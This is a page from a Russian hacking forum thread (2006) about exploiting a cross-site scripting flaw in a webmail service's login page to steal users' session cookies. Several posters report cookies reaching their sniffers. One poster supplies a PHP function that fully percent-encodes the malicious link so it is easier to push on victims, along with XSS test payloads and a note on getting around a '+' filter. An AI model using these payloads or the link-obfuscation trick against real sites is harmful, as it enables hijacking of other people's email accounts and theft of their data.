HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 05.12.2006, 16:03
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию

Spaсибо, все ок!!!
 
Ответить с цитированием

  #22  
Старый 05.12.2006, 17:40
Makes
Познающий
Регистрация: 21.11.2006
Сообщений: 30
С нами: 10247373

Репутация: -1
По умолчанию

Все вроде делаю, как указано на первой странице. Чего то не прокатывает. Видимо делаю что-то не так. Ваш рабочий вариант на данный момент отличается от оного на первой странице?
 
Ответить с цитированием

  #23  
Старый 05.12.2006, 17:51
m17
Новичок
Регистрация: 05.12.2006
Сообщений: 22
С нами: 10226922

Репутация: 6
По умолчанию

вчера "+" фильтровать начали, но с concat все нормально пашет. советую ссылку обработать такой функией:
PHP код:
function full_encode($str)
{
    
$result '';
    for (
$i=0$i strlen($str); $i++)
        
$result .= ("%" bin2hex(substr($str$i1)));

    return 
strtoupper($result);
        

так проще впарить. думаю Вам не надо объяснять почему так...
 
Ответить с цитированием

  #24  
Старый 05.12.2006, 18:11
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию

Ничё там не фильтруется!...
всё работает!
 
Ответить с цитированием

  #25  
Старый 05.12.2006, 18:18
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))
 
Ответить с цитированием

  #26  
Старый 05.12.2006, 18:18
Chumak
Познающий
Регистрация: 27.10.2006
Сообщений: 59
С нами: 10283366

Репутация: 6
По умолчанию

А у меня куки на сниффер только от фаерфокса почемуто приходят...
 
Ответить с цитированием

  #27  
Старый 05.12.2006, 18:19
Chumak
Познающий
Регистрация: 27.10.2006
Сообщений: 59
С нами: 10283366

Репутация: 6
По умолчанию

"пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))"
Точно...
 
Ответить с цитированием

  #28  
Старый 05.12.2006, 18:27
Makes
Познающий
Регистрация: 21.11.2006
Сообщений: 30
С нами: 10247373

Репутация: -1
По умолчанию

Ну почему тогда у меня ничего не пашет. Выдает:

Ошибка: Неверно указан логин или пароль

А наряду с полями для логина и пароля выдает (">) без скобок
 
Ответить с цитированием

  #29  
Старый 05.12.2006, 18:28
m17
Новичок
Регистрация: 05.12.2006
Сообщений: 22
С нами: 10226922

Репутация: 6
По умолчанию

Цитата:
Ничё там не фильтруется!...
всё работает!
Фильтруется.
Код HTML:
"><script>alert(document.cookie);</script><br style="
покажет куки
Код HTML:
"><script>alert(document.cookie+'dead-plus');</script><br style="
промолчит

откроем исходник и увидим:
Код HTML:
name="tcurl" value=""><script>alert(document.cookie "dead-plus");</script>
("+" исчез)

только что еще раз затестил
 
Ответить с цитированием

  #30  
Старый 05.12.2006, 18:37
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию

ХЗ ..куки приходят!
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Реализация XSS на rambler.ru Майор Уязвимости Mail-сервис 8 21.09.2006 20:50
Xss на mail.ru em00s7 Уязвимости Mail-сервис 14 08.06.2006 00:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.